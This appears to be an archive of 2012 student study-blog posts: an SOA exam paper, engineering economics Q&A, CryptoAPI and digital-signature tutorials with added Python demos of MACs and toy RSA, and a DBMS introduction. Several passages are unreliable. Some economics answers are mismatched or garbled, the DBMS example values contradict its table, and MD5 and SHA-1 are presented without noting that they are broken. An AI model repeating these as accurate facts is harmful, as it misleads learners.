Wednesday 28 November 2012

IT2401 Service Oriented Architecture question paper for NOV/DEC 2011



1. Define SOA.
2. How do components in an SOA inter-relate?
3. What are Wrapper Services?
4. Compare Abstract and Concrete description.
5. List the Goals of service-oriented analysis.
6. What is the usage of Envelope element in SOAP message structures?
7. What is Message Processing Logic?
8. What are Dynamic proxy and dynamic invocation interface?
9. How are the switch, case, and otherwise elements used in WS-BPEL?
10. What are Policy element and common policy assertions?
PART B — (5 × 16 = 80 marks)
11. (a) Explain the Common Principles of Service Orientation in detail.
Or
(b) Compare SOA to Client-Server and Distributed Architecture.
12. (a) Discuss about three Service Layers in detail.
Or
(b) (i) Explain the importance of messaging with SOAP and message exchange patterns in web services. (5 + 5)
(ii) Write a note on Atomic Transactions. (6)
13. (a) Discuss the step by step process of Service modeling in detail.
Or
(b) Explain Entity-Centric and Task-Centric business Service design in detail.
14. (a) Explain SOA platform and describe the APIs in J2EE which are used to build SOA.
Or
(b) How is Service Oriented Architecture achieved in .NET platform? Discuss.
15. (a) Describe Root element and Series of Common child element of WS-BPEL Process definition.
Or
(b) Discuss WS-Security Language in detail.

Sunday 25 November 2012

Engineering Economics & Financial Accounting MG2452: 2 Marks





TWO MARK QUESTIONS AND ANSWERS

UNIT – I

INTRODUCTION

1. Define Managerial Economics

By combining the basic definition of the two terms “Manager” and “Economics” you get the definition of “managerial economics”. “Managerial Economics” is the study of directing resources in a way that most efficiently achieves the managerial goals.

 Managerial Economics is also the application of the tools of economics analysis in decision making in actual business situations.

2. What is meant by Micro economic analysis?

Micro economic analysis deals with the problems of an individual firm, industry or consumer. It helps in dealing with issues which go on within the firm, such as putting the resources available with the firm to their best use, allocating resources among the various activities of the firm, and being technically and economically efficient.

3. What is meant by Prescriptive approach?

 Prescriptive or normative approach tells “How things ought to be done”.

4. What is meant by descriptive approach?

 Descriptive approach tells “how things are done”.

5. Scope of Managerial Economics:

 The following aspects constitute the scope of managerial economics:

1. Objectives of a business firm

2. Demand analysis and forecasting

3. Cost analysis

4. Production management

5. Supply analysis

6. Pricing decisions, policies and practices

7. Profit management

8. Capital budgeting and investment decisions

9. Decision theory under uncertainty

10. Competition

6. Give the Objectives of a business firm

The objectives of a business firm may be varied. Apart from generating profits a firm has many other objectives like being a market leader, being a cost leader, achieving superior efficiency, achieving superior quality, achieving superior customer responsiveness etc.

7. What is meant by Supply Analysis?

 Supply analysis deals with the various aspects of supply of a commodity. Certain important aspects of supply analysis are supply schedule, curves and function, elasticity of supply, law of supply and its limitations and factors influencing supply.

8. What is meant by Capital Budgeting?

 Capital budget is the planning of expenditure on assets.

9. Use of Engineering Economics:

 Engineering economics accomplishes several objectives. It presents the aspects of traditional economics that are relevant for business and engineering decision making in real life.

10. Define Logistics:

 It is the movement of goods from one place to the other.

11. Define Inbound Logistics:

 It is the movement of raw materials to the factory premises.

12. Define outbound logistics:

 It is the movement of finished goods to wholesaler or retail outlets and to the final consumers.

13. Define Statistics:

 Statistics provide the basis for empirical testing of theory. Generalizations or theory cannot be accepted for practice unless these theories are checked against the data from the reality. This way, theories become more practical and useful in real life business situation.

14. Define Economics and define the divisions of Economics:

Economics has two divisions, namely micro economics and macro economics. Micro economics is the branch of economics where the unit of study is an individual or a firm, while macro economics is the branch of economics where the unit of study is aggregative in character and considers the entire economy.

15. Define Accounting:

 Accounting can be defined as the recording of financial operations of an organization. Managerial decisions on profits and sales etc. derive input largely from the accounting statement of a firm.

16. Define Managerial Economics and Mathematics:

Many of the theories in mathematics find use in economics. Concepts such as calculus, vectors, logarithms and exponentials, determinants and matrices, and algebra are a few to name. Managerial economics is metrical in character: it estimates various economic relationships, predicts relevant economic quantities and uses them in decision making and planning for the future. So mathematics becomes an important tool in managerial economics.

17. Define Operations research:

Operations research was developed as a science during the Second World War to solve the complex operational problems of planning and resource allocation in defense and in basic industries which specifically supplied military equipment. These theories find high usage in various fields of management to solve problems pertaining to logistics, both inbound and outbound, and also the movement of material within the factory premises.

18. Define a competitor.

The competitors of the firm are also likely to react or even pro-act to any decisions made by the firm. Competitors always try to navigate the competitive advantage gained by the firm. Thus managers will have to make wise investments in projects that will be hard to be imitated by the competition.

19. Define Decision theory under uncertainty:

Most of the business decisions taken by managers are made under uncertainty. Uncertainties pertaining to demand, cost, price, profit, capital etc. prevail most of the time when decisions are made. This makes the whole decision making process difficult and complex. The tools used in economic analysis have been modified and refined so as to take the uncertainty into account and thus help decision making in a logical and scientific manner.

20. Define Profit Management:

 All business firms are motivated and committed to produce profits. Profits are one of the tangible yardsticks to measure the performance of the firm and the managers concerned. It also signifies the health of the firm. Profits are influenced by various factors such as cost of production, revenues and other factors both internal and external to the firm. Profits are hard to predict.

21. Define Pricing Decisions

 A firm’s profitability and success greatly depend on the pricing decisions and the pricing policies of the firm. The patronization of the firm’s products by the customers, the competition faced by the product along with the profits of the firm, largely depends on the price of the product. Pricing also depends on the environment in which the firm operates, competitions, customers etc.

22. Define Production Management:

 When a manager organizes and plans the firm’s production functions i.e. when he tries to convert the raw materials to finished product, he faces a number of economic problems. The study of ‘production function’ describes the input output relationship.

23. Define Cost Analysis:

 One way to earn higher profits is by controlling the cost involved in producing the product. Study of cost is necessary for making efficient and effective managerial decisions. If a detailed cost analysis and estimation is done, the firm can move upon effective profit management and sound pricing practices.

24. What are the Macro economic Conditions?

(a) The economy in which firms operate is predominantly a free enterprise economy.

(b) The present day economy is undergoing rapid technological and economic changes and,

(c) The government intervening in the economic affairs has increased in the recent times and is likely to go up further.


25. What are the Common points in Managerial Economics?

1. Managerial economics deals with the decision making by managers, executives and engineers of economic nature.

2. Managerial economics is goal oriented.

3. Managerial Economics is both conceptual and metrical.

4. Managerial economics is pragmatic.

UNIT – II

DEMAND AND SUPPLY ANALYSIS

1. Define Demand.

Demand indicates the quantities of products (goods and services) which the firm is willing and financially able to purchase at various prices, holding other factors constant.

2. Define Determinants of Demand:

 An individual’s demand for a commodity depends on his desire and capability to purchase it. Apart from the desire to purchase, there are many other factors which influence the purchase of a product (demand). These are known as demand determinants.

3. What is meant by Tastes and preferences of Consumers?

 The change of tastes and preferences of consumers in favor of a commodity will result in a greater demand for the commodity. The opposite also holds good i.e. if the tastes and preferences of consumer change against the commodity, the demand will suffer.

4. What are the two kinds of Consumers expectations?

 Consumers have two kinds of expectations one pertains to their future income and the second is related to the future prices of the goods and its related goods.

5. Define Advertising

 Advertisements provide information about the presence of quality products in the market and induce customers to buy more. It also promotes the latest preferences of the general public to masses.

6. Define the Law of Demand:

 The relation of price to quantity demanded / sales is known as the law of demand. Law of demand states that the higher the price is the lower the demand is and vice versa, holding other factors as constant.

7. Define the price quantity relation.

 This price quantity relation can be expressed as demand being a function of price

 D=f (p).

8. What Highlights of the law of demand:

1. The relationship between price and quantity demanded is inverse.

2. Price is the independent variable and demand is the dependent variable.

3. Law of demand assumes that except for price and demand, other factors remain constant.

9. What is Demand Shift: (Change in demand?)

 Factors shift the demand for a particular product either on the right side of the demand curve or to the left side of the demand curve based on the changes in price. These factors, other than the price of a good that influence demand are known as demand shifters. The shift in the demand either to the left or right is called the demand shift.

10. What are the Exceptions to law of demand?

1. In share markets one would have noticed that a rise in the price of shares increases the sales of the shares, while a decrease in the price of the shares results in a decrease in sales of the shares.

2. Some goods which act as a status symbol and have a snob appeal fall under this category. Here, when the price of the product rises, the appeal of the product also rises and thus the demand. Examples are diamonds and antiques.

3. Finally, ignorance on the part of the consumer may cause the consumer to buy at a higher price, especially when the rise in price is taken to mean an improvement in quality and a reduction in price as deterioration in quality.

11. Define Individual demand:

 The quantity of a product demanded by an individual purchaser at a given price is known as individual demand.

12. Define Market demand:

 The total quantity demanded by all the purchasers together is known as the market demand.

13. What are the types of Demand Function?

1. Consumption function

2. Product consumption function

3. Differences in regional incomes

4. Income expectation and demand

14. What are the Characteristics of demand function?

1. The long run relationship between consumption and income is somewhat stable, and expenditure on consumption is usually about 85 to 90% of the income.

2. The consumption function is highly unstable in short runs and the relationship between income and consumption cannot be predicted by any mathematical formula.

3. During periods of economic prosperity, there is an absolute increase in the expenditure on consumption, but a decrease as a percentage of income. During periods of depression, consumption declines absolutely but the expenditure on consumption increases as a percentage of income.

4. In the periods of economic recovery, the rate of increase in consumption is higher than the rate of the decline in consumption in times of recession.

15. Define Product consumption function:

 This function can be defined as the relationship between the total income of the consumer and sales of particular products. It means that when there is a change in income there is a change in the demand for particular products.

16. Define Income expectations and Demand:

 Expectations are related to people’s estimates of the level and durability of the future economic conditions. The demand for many consumer durables (household appliances like TV, Washing machine, etc) is often sensitive to general expectations regarding income level.

17. What are the features of advertising demand relationship?

1. Even when there is no advertising effort done, there will be a certain amount of sales possible for a particular product by virtue of its presence in the market.

2. There is a direct relationship between advertising and sales. Thus, when there is increased spending on advertisements, it will bring in more sales.

3. Increase in advertisements will lead to more than proportionate increase in sales only to a point. After that any increase in advertisement will have only less than proportionate effect on sales.


18. Define Elasticity of Demand?

 Elasticity of demand is defined as ‘the percentage change in quantity demanded caused by one percent change in the demand determinant under consideration, while other determinants are held constant’.

19. Define demand determinant

 It is the degree of change in demand to the degree of change in any of the demand determinants.

20. What are the various elasticities?

 1. Price elasticity of demand

2. Income elasticity of demand

3. Cross elasticity of demand

4. Promotional elasticity

5. Expectations elasticity of demand

21. Define Price Elasticity of Demand

 Price elasticity of demand can be defined as “the degree of responsiveness of quantity demanded to a change in price”.

22. What are the Types of price elasticity:

1. Perfectly elastic demand

2. Absolutely inelastic demand or perfectly inelastic demand

3. Unit elasticity of demand

4. Relatively elastic demand

5. Relatively inelastic demand

23. Define absolutely inelastic demand or perfectly inelastic demand (ep=):

 Absolutely inelastic demand is where a change in price howsoever large, causes no change in the quantity demanded of a product. Here, the shape of the demand curve is vertical.

24. Define Relatively elastic demand (ep>1):

It is where a reduction in price leads to a more than proportionate change in demand. Here the shape of the demand curve is flat.

25. What are the factors determining price elasticity of demand?

 The elasticity of demand depends on the following factors namely

1. Nature of the product

2. Extent of usage

3. Availability of substitutes

4. Income level of people

5. Proportion of the income spent on the product

6. Urgency of demand and

7. Durability of a product.


UNIT III

1. Say some of the main cost concepts.

1) Actual costs and opportunity costs

2) Incremental costs and sunk costs

3) Explicit costs and implicit costs

4) Past costs and future costs

5) Accounting costs and economic costs

6) Direct cost and indirect cost

7) Private costs and social costs

8) Controllable costs and non controllable costs

9) Replacement costs and original costs

10) Shutdown costs and abandonment costs

11) Urgent costs and postponable costs

12) Business costs and full costs

13) Fixed costs and variable costs

14) Short run and long run costs

15) Incremental costs and marginal costs

2. What are actual costs and opportunity costs ?

Actual costs are those which a firm incurs for producing or acquiring a product or a service. Examples of these are the costs of raw materials, labor, rent and interest.

3. What are incremental costs and sunk costs ?

Incremental cost is the additional cost due to a change in the level or nature of business activity. Sunk costs are the costs that are not altered by a change in the quantity produced and cannot be recovered.

4. What are Explicit costs and implicit costs ?

Explicit or paid out costs are those expenses which are actually paid by the firm. Implicit costs are the theoretical costs in the sense that they go unrecognized by the accounting system.

5. What are past costs and future costs ?

Past costs are the actual costs incurred in the past and are generally contained in the financial accounts. Future costs are costs that are expected to occur in some future period or periods.

6. What are accounting costs and economic costs ?

Accounting costs are the actual outlay costs. Economic costs relate to the future.

7. What is direct and indirect cost ?

Direct costs, also called traceable or assignable costs, are the ones that have a direct relationship with a unit of operation like a product, a process or a department of the firm. On the other hand, indirect costs, also called non-traceable, common or non-assignable costs, are the costs whose source cannot be easily and definitely traced to the plant.

8. What are private costs and social costs ?

Private costs are those which are actually incurred or provided for the business activity by an individual or the business firm. Social costs, on the other hand, are the total costs to the society on account of production of a good.

9. What are controllable and non controllable costs ?

Controllable costs are those which are capable of being controlled or regulated by the managers, and they can be used to assess a manager's efficiency in controlling the cost in his department. Non-controllable costs are those which cannot be subjected to administrative controls and supervision.

10. What are replacement costs and original costs ?

Original costs or the historical costs are the costs paid for assets such as land, building, cost of plant, equipment and materials. Replacement costs are the costs that the firm incurs if it wants to replace or acquire the same assets now.

11. What is shut down cost and abandonment cost ?

Shutdown costs are costs which the firm incurs if it temporarily stops its operations. Abandonment costs are the costs of retiring a fixed asset from use altogether.

16) What are incremental cost and marginal cost?

Incremental cost is important when dealing with decisions where discrete alternatives are to be compared. Marginal cost deals with one unit of output.

17) What are the determinants of cost?

1) Level of output

2) Price of inputs

3) Size of plant

4) Output stability

5) Production lot size

6) Level of capacity utilization

7) Technology

8) Learning effect

9) Breadth of product range

10) Geographical location

18) What are the two aspects of cost output relationships?

1) Cost output relationship in the short run.

2) Cost output relationship in the long run.

19) What are the terms involved in cost output relationship?

1) Average fixed cost.

2) Average variable cost.

3) Average total cost.

20) What is level of capacity utilization?

The higher the capacity utilization, the lower the fixed cost per unit of output is bound to be.

21) What is output stability?

Stability of output leads to savings in various kinds of hidden costs of interruption and learning.

22) What is size of plant?

Production costs are usually lower in bigger plants than in smaller plants.

23) What is cost?

Cost is the money spent on producing and selling a product to the customers. The cost of a product starts from the raw materials and runs through production costs to selling costs, which include the cost of maintaining outlets.

24) What is the significance of cost in managerial decision making?

Study of costs is essential for making a choice from among the competing production plans. Production decisions are not possible without their respective cost considerations.

25) What is price of input?

If the price of raw materials, labor or power increases, then naturally the cost of production goes up. The cost of production varies directly with the prices of inputs.

 UNIT-IV

1) What are the two factors in pricing strategies?

1) External factors

2) Internal factors

2) What are the external factors in pricing strategies?

i. The competition in the market

ii. The elasticity of supply and demand

iii. Trends of the market

iv. Purchasing power of buyers.

v. Government policies towards prices.

3) What are the two factors in pricing strategies?

1) The costs

2) Management policy towards the gross margin and the sales turnover

4) What are the determinants?

1) Objectives of business

2) Competition

3) Product and promotional strategies

4) Nature of price sensitivity

5) Influence of middlemen

6) Routinisation of pricing

7) Government regulation

5) What are the objectives of business?

The fundamental objective of a firm is to survive in the business and then thrive. The pricing strategy adopted by a firm is very much influenced by these factors.

6) What is competition in pricing strategy?

To come out with a pricing policy that will be advantageous to the firm, managers require a perfect understanding of the competitive environment in which the firm is placed.

7) What are product and promotional strategies?

i. The product itself

ii. Pricing

iii. Promotion activities

iv. Distribution of products through the channel to the consumer.

8) What is nature of price sensitivity?

We know that many factors contribute to the increase of price sensitivity, but managers should not ignore the factors that minimize price sensitivity when designing pricing strategies.

9) What is influence of middlemen?

Middlemen are the ones who stock the finished product of the manufacturer to sell it to the customers. These are also called the channel of distribution.

10) What is routinization of price?

This strategy of pricing relies on the tried and trusted pricing strategies which the organization has followed all along. This pricing practice is often routinized, but the extent varies from company to company and from product to product.

11) What is the government regulation in pricing?

In order to safeguard the interests of the public, the government acts on their behalf to prevent the abuse of monopolistic power and collusion among businesses.

12) Say some of the objectives of the pricing policy?

 i. profit maximization.

 ii. long term welfare of the firm.

 iii. facing competition.

 iv. flexibility to economic changes.

 v. satisfying rate of returns.

13) What are the cost oriented pricing method?

 i. cost plus pricing or full cost pricing.

 ii.marginal cost pricing or incremental or direct cost pricing.

 iii.target pricing or rate pricing.

 iv. programme pricing.

14) What are the competition oriented pricing methods?

i. Going rate pricing.

ii. Loss leader pricing.

iii. Customary pricing.

iv. Price leadership pricing.

v. Trade association pricing.

vi. Cyclical pricing.

vii. Imitative pricing.

viii. Turnover pricing.

15) What are the pricing based methods?

i. Administered pricing.

ii. Dual pricing.

iii. Price discrimination or differential pricing.

16) What are cost oriented pricing methods?

i) cost plus.

ii) marginal cost pricing.

iii) target pricing.

17) What is going rate pricing method?

In going rate pricing the emphasis is on the market situation unlike the full cost pricing where the emphasis was on costs.

18) What is leadership pricing method?

This pricing strategy is widely used in the retailing business. Because the name has the word "loss" in it, this policy may be confused with pricing which results in losses.

19) What is customary pricing method?

In case of some products their prices get more or less. This does not happen due to deliberate action on the seller's part, but as a result of the product prevailing in the market for a long period of time.

20) What is price leadership method?

In any industry, out of all the firms operating in the industry, at least one firm will have its cost of production lower than all other firms.

21) What is trade association pricing method?

This kind of pricing arises out of an unsaid understanding or agreement between the firms operating in the market.

22) What is the cyclical pricing method?

The pricing method which is done to capitalize on the cycles of the seasons in nature and the cycles in the economy is known as cyclical pricing.

23) What is imitative pricing method?

It is very similar to the loss leader pricing method. This pricing policy is often used in retail business.

24) What is turnover pricing method?

Turnover is the word which denotes the sales of the product. Higher turnover means higher sales.

25) What is dual pricing method?

Usually the firms which produce essential commodities have part of their product under administered pricing, and part of the product is sold in the free market.

26) What is price?

Price is the source of revenue for the firm and it decides the health of the firm. The customer acceptance or rejection of a product is most of the time predominantly influenced by price.

27) What are the external factors influencing the pricing decision?

i. The competition in the market.

 ii.the elasticity of supply and demand.

 iii.trends of the market.

 iv.purchasing power of buyers.

 v.government policies towards prices.


UNIT-V


1) What is balance sheet?

The balance sheet provides the financial position of a company at any given point of time.

2) Say some of the important financial statements?

i. Profit and loss account.

ii. Balance sheet.

iii. Fund flow statement.

3) What are the contents of a balance sheet?

i.assets

ii.liabilities.

4) Say some of the types of assets?

 i.fixed assets.

 ii.investments.

 iii.current assets.

 iv.loans and advances.

v. Miscellaneous expenditure

5) What are fixed assets?

Their life period is very long; these are purchased for carrying out the operations of a company. Using these the company can generate revenue.

6) What is investment?

The long term and short term financial securities owned by a company come under this category. Here long term investment means buying shares of other companies.

7) What are current assets?

Any asset that can be converted into cash within one year is called a current asset. They would be converted into cash at the end of the operating cycle of a firm.

8) What are the items that come under current assets?

i. Cash.

ii. Debtors.

iii. Inventories.

9) What are loans and advances?

It is the amount that a company loans to its employees, and advances given to suppliers, government contractors and other agencies; it also includes prepaid expenses.

10) What are the types of liabilities?

 i.share capital.

ii. Reserves and surpluses.

 iii.secured loans.

 iv.unsecured loans.

 v.current liabilities.

11) What is meant by share capital?

It includes both equity share capital and preference share capital. Equity shareholders are the owners of a company; they take the risk and their dividend is not fixed, but in the case of preference share capital the dividend rate is fixed.

12) What is meant by Reserves and Surpluses?

It is nothing but the profit that is retained by a company by not paying it out as dividend to the shareholders.

13) What are the types of reserves ?

 i.revenue reserve.

ii. Capital reserve.

14) What is meant by secured loans?

 Loan amount borrowed by the firm by pledging assets (ie) securities are provided for these loans.

15) What is meant by unsecured loans?

In this case no security is provided; examples are fixed deposits, loans and advances.

16) What is meant by current liabilities?

This consists of the amount that is due to suppliers when goods are purchased on a credit basis, advance payments received, accrued expenses and provisions for tax.

17) What is meant by income statement?

The Companies Act does not prescribe any particular way in which the profit and loss account or the income statement has to be prepared. This statement reflects the performance of a company over a period of time.

18) Who are all the users of financial statement?

 i.management.

ii. Shareholders, investors, analysts.

 iii.lenders

 iv.suppliers.

 v.customers.

 vi.employees.

vii. Government and regulatory agencies.

 viii.others

19) What is meant by cash flow statement?

A firm would get into trouble if it spends more cash than it is able to generate. The firm should generate adequate cash for its survival.

20) How the cash flow of a business can be classified?

 a. operating activities

 b. investing activities

 c. financing activities

21)what is meant by ratio analysis?

It is one of the powerful tools for financial statement analysis. A ratio is nothing but the relationship between two or more items.

22) What are the different ways of carrying out analysis?

 a. past ratio

 b. competitors ratio

 c. industrial ratio

 d. projected ratio

23) What is meant by past ratio?

The current financial year's ratios can be compared with the previous years' ratios to find whether the financial position has improved over the years or not.

24) What is meant by competitor’s ratio?

 The ratio of a company can be compared with the ratio of the competitors and with the market leader.

25) What is meant by industry ratio?

 The ratios of a firm can be compared with the ratios of the industry to which the particular firm belongs to.

Friday 26 October 2012

Key Databases

Each cryptographic service provider (CSP) has a key database in which it stores persistent cryptographic keys. Each key database contains one or more key containers, each of which contains all the key pairs belonging to a specific user. The following illustration shows the relationship between CSPs, key databases, and key containers.
The CSP stores each key container from session to session, including all of the public/private key pairs that it contains. However, session keys are not automatically persisted to any permanent storage media.
Generally, a default key container is created for each user. Default key containers have a default name.
An application can create its own key container and key pairs, and assign a name to the key container. A key is created for each user and each machine. For each user, the key container is located in the HKEY_CURRENT_USER\Comm\Security\Crypto registry key. For each machine, the key container is located in the HKEY_LOCAL_MACHINE\Comm\Security\Crypto registry key.
CryptoAPI encrypts the contents of the key container using the CryptProtectData function. Note that all applications can read and decrypt both user and machine keys by calling CryptUnprotectData on the encrypted key contents.

Hashing and Digital Signature Algorithms

This section lists several algorithms used to compute hashes and digital signatures. Each of these algorithms is supported by the Microsoft RSA Base Provider.
The MD2, MD4, and MD5 hashing algorithms were all developed by RSA Data Security, Inc. These algorithms were developed in sequential order. The later algorithms are generally more secure than the earlier ones. All three algorithms generate 128-bit hash values.
The secure hashing algorithm (SHA) was developed by the National Institute of Standards and Technology (NIST) and by the National Security Agency (NSA). This algorithm was developed for use with digital signature algorithm (DSA) or Digital Signature Standard (DSS). This algorithm generates a 160-bit hash value.
Message authentication codes are similar to hash values, but are computed using a session key. Because of this, you must possess the session key to recompute the hash value to verify that the base data has not changed.
The message authentication codes implemented by the Microsoft RSA Base Provider are of the most common sort: block cipher message authentication codes. This method encrypts the base data with a block cipher in chaining mode and uses the last encrypted block as the hash value. The encryption algorithm used to build the Message Authentication Code is the one that was specified when the session key was created.
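The keyed-verification point made above (only a holder of the session key can recompute the MAC, so a tampered message or a different key fails the check), as an added example that is not part of the original page. It uses HMAC-SHA256 from the Python standard library in place of CryptoAPI's block-cipher MAC, since the standard library has no block cipher; the principle is the same. The sample message and the randomly drawn keys are constructed for the demonstration.

```python
import hashlib
import hmac
import os


def digest_bits(algorithm: str) -> int:
    """Size in bits of the hash value produced by the named algorithm (md5, sha1, ...)."""
    return hashlib.new(algorithm).digest_size * 8


def make_mac(session_key: bytes, data: bytes) -> bytes:
    """Keyed MAC over data. HMAC-SHA256 here; CryptoAPI would use the session key's block cipher."""
    return hmac.new(session_key, data, hashlib.sha256).digest()


def check_mac(session_key: bytes, data: bytes, tag: bytes) -> bool:
    """Recompute the MAC with the session key and compare in constant time."""
    return hmac.compare_digest(make_mac(session_key, data), tag)


def demo() -> dict:
    key = os.urandom(32)                     # session key shared by sender and receiver (constructed)
    data = b"transfer 100 to account 42"     # constructed sample message
    tag = make_mac(key, data)
    return {
        "md5_bits": digest_bits("md5"),      # 128, as the text states
        "sha1_bits": digest_bits("sha1"),    # 160, as the text states
        "valid": check_mac(key, data, tag),
        # a changed message no longer matches the tag
        "tampered_detected": not check_mac(key, b"transfer 900 to account 42", tag),
        # without the right session key the tag cannot be recomputed
        "wrong_key_rejected": not check_mac(os.urandom(32), data, tag),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

`hmac.compare_digest` matters: comparing tags with `==` leaks how many leading bytes matched through timing, which is why MAC verification routines use a constant-time comparison.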

Digital Signature

What is a Digital Signature?
An introduction to Digital Signatures, by David Youd



[Illustration: Bob with his two keys, one labelled "Bob's public key" and the other "Bob's private key".]
Bob has been given two keys. One of Bob's keys is called a Public Key, the other is called a Private Key.

[Illustration: Bob's co-workers Pat, Doug and Susan. Anyone can get Bob's Public Key, but Bob keeps his Private Key to himself.]
Bob's Public key is available to anyone who needs it, but he keeps his Private Key to himself. Keys are used to encrypt information. Encrypting information means "scrambling it up", so that only a person with the appropriate key can make it readable again. Either one of Bob's two keys can encrypt data, and the other key can decrypt that data.
Susan (shown below) can encrypt a message using Bob's Public Key. Bob uses his Private Key to decrypt the message. Any of Bob's coworkers might have access to the message Susan encrypted, but without Bob's Private Key, the data is worthless.

[Illustration: Susan's plaintext "Hey Bob, how about lunch at Taco Bell. I hear they have free refills!" is encrypted with Bob's Public Key into the unreadable ciphertext "HNFmsEm6Un BejhhyCGKOK JUxhiygSBCEiC 0QYIh/Hn3xgiK BcyLK1UcYiY lxx2lCFHDC/A", which Bob's Private Key turns back into the original message.]
With his private key and the right software, Bob can put digital signatures on documents and other data. A digital signature is a "stamp" Bob places on the data which is unique to Bob, and is very difficult to forge. In addition, the signature assures that any changes made to the data that has been signed cannot go undetected.
To sign a document, Bob's software will crunch down the data into just a few lines by a process called "hashing". These few lines are called a message digest. (It is not possible to change a message digest back into the original data from which it was created.)

Bob's software then encrypts the message digest with his private key. The result is the digital signature.

Finally, Bob's software appends the digital signature to the document. All of the data that was hashed has been signed.

Bob now passes the document on to Pat.

First, Pat's software decrypts the signature (using Bob's public key) changing it back into a message digest. If this worked, then it proves that Bob signed the document, because only Bob has his private key. Pat's software then hashes the document data into a message digest. If the message digest is the same as the message digest created when the signature was decrypted, then Pat knows that the signed data has not been changed.
Plot complication...

Doug (our disgruntled employee) wishes to deceive Pat. Doug makes sure that Pat receives a signed message and a public key that appears to belong to Bob. Unbeknownst to Pat, Doug deceitfully sent a key pair he created using Bob's name. Short of receiving Bob's public key from him in person, how can Pat be sure that Bob's public key is authentic?
It just so happens that Susan works at the company's certificate authority center. Susan can create a digital certificate for Bob simply by signing Bob's public key as well as some information about Bob.

Bob Info:
    Name
    Department
    Cubicle Number
Certificate Info:
    Expiration Date
    Serial Number
Bob's Public Key:
    (the key itself, signed together with the information above by Susan)

Now Bob's co-workers can check Bob's trusted certificate to make sure that his public key truly belongs to him. In fact, no one at Bob's company accepts a signature for which there does not exist a certificate generated by Susan. This gives Susan the power to revoke signatures if private keys are compromised, or no longer needed. There are even more widely accepted certificate authorities that certify Susan.
Let's say that Bob sends a signed document to Pat. To verify the signature on the document, Pat's software first uses Susan's (the certificate authority's) public key to check the signature on Bob's certificate. Successful decryption of the certificate signature proves that Susan created it. After the certificate signature is decrypted, Pat's software can check if Bob is in good standing with the certificate authority and that all of the certificate information concerning Bob's identity has not been altered.
Pat's software then takes Bob's public key from the certificate and uses it to check Bob's signature. If Bob's public key decrypts the signature successfully, then Pat is assured that the signature was created using Bob's private key, for Susan has certified the matching public key. And of course, if the signature is valid, then we know that Doug didn't try to change the signed content.

Although these steps may sound complicated, they are all handled behind the scenes by Pat's user-friendly software. To verify a signature, Pat need only click on it. 
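The whole story above (hash, sign with the private key, verify with the public key, then Susan's certificate defeating Doug's substituted key pair) carried through in runnable form, as an added example that is not part of David Youd's article. It uses a toy textbook RSA over small primes so the arithmetic stays visible; the primes, the names and the certificate fields are constructed for the demonstration, and such tiny unpadded keys are never usable for real signatures.

```python
import hashlib
import json


# Toy textbook RSA over small primes (assumption for illustration only; real keys are
# 2048-bit and use padding). Signing "encrypts" the digest with the private exponent.
def make_keypair(p: int, q: int, e: int = 65537):
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)              # private exponent (needs Python 3.8+)
    return (n, e), (n, d)            # (public key, private key)


def message_digest(data: bytes, n: int) -> int:
    """'Crunch down' the data with a hash, reduced into the toy modulus range."""
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n


def sign(data: bytes, private_key) -> int:
    n, d = private_key
    return pow(message_digest(data, n), d, n)    # "encrypt" the digest with the private key


def verify(data: bytes, signature: int, public_key) -> bool:
    n, e = public_key
    # "decrypt" the signature with the public key and compare with a fresh digest
    return pow(signature, e, n) == message_digest(data, n)


def canonical(info: dict) -> bytes:
    """Fixed byte encoding of the certificate body so signer and verifier hash the same bytes."""
    return json.dumps(info, sort_keys=True).encode()


def issue_certificate(subject_info: dict, subject_public_key, ca_private_key) -> dict:
    """Susan's job: sign the subject's public key together with information about the subject."""
    body = dict(subject_info, public_key=list(subject_public_key))
    return {"body": body, "ca_signature": sign(canonical(body), ca_private_key)}


def verify_with_certificate(data, signature, cert, ca_public_key, expected_name) -> bool:
    """Pat's job: check the certificate with the CA's key, then the document with the certified key."""
    body = cert["body"]
    if not verify(canonical(body), cert["ca_signature"], ca_public_key):
        return False            # not issued by the CA: a self-made certificate stops here
    if body.get("name") != expected_name:
        return False            # genuine certificate, but for someone else
    return verify(data, signature, tuple(body["public_key"]))


def demo() -> dict:
    # Constructed key pairs for Susan (the CA), Bob and Doug; all six numbers are primes.
    susan_pub, susan_priv = make_keypair(10037, 10039)
    bob_pub, bob_priv = make_keypair(10007, 10009)
    doug_pub, doug_priv = make_keypair(10061, 10067)

    bob_info = {"name": "Bob", "department": "Sales", "cubicle": "42",
                "serial": 1, "expires": "2013-12-31"}          # constructed values
    bob_cert = issue_certificate(bob_info, bob_pub, susan_priv)

    document = b"Hey Bob, how about lunch at Taco Bell. I hear they have free refills!"
    bob_sig = sign(document, bob_priv)

    # Plot complication: Doug signs with his own key and hands Pat a "Bob" certificate
    # that Doug, not Susan, signed.
    doug_cert = issue_certificate(dict(bob_info), doug_pub, doug_priv)
    doug_sig = sign(document, doug_priv)

    return {
        "bob_signature_verifies": verify_with_certificate(document, bob_sig, bob_cert, susan_pub, "Bob"),
        "tampered_document_rejected": not verify_with_certificate(
            document + b"!", bob_sig, bob_cert, susan_pub, "Bob"),
        "doug_forged_certificate_rejected": not verify_with_certificate(
            document, doug_sig, doug_cert, susan_pub, "Bob"),
        # why Pat needs the certificate: Doug's signature checks out under the key Doug supplied
        "doug_key_alone_would_pass": verify(document, doug_sig, doug_pub),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The last entry in `demo()` is the point of the certificate step: a signature is only as trustworthy as the binding between the public key and the person, and that binding is what Susan's signature on the certificate provides.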





Wednesday 3 October 2012

DATABASE MANAGEMENT SYSTEM (DBMS)

WHAT IS DATA?
Data is the name given to facts or entities such as names and numbers. e.g.  Weight, prices, marks etc.

WHAT IS INFORMATION?
Information is data that has been converted into a more useful form.

WHAT IS DATABASE?
A database can be defined as a collection of coherent, meaningful data (information), or as facts or information placed in an organized form.
Without organization, information has no meaning.
A database is an organized collection of data that is useful to us. The data in a database can be modified or deleted, and new data can be added. Data is stored in the form of records, as shown in the table below:

EMP_ID   EMP_NAME   AGE   SALARY
1101     SIMRAN     21    22000

The above table shows a single record. The columns Emp_id, Emp_Name, Age and Salary are the fields or attributes, while the row containing the corresponding values (1101, Ana, 28, 15000) is a single record. There can be a number of records in a table and a number of tables in a database. The tables in a database are related to each other through one or more attributes/fields.

Database is of two types:
1.    Manual databases: Databases created by human beings without any support from a computer are known as manual databases.
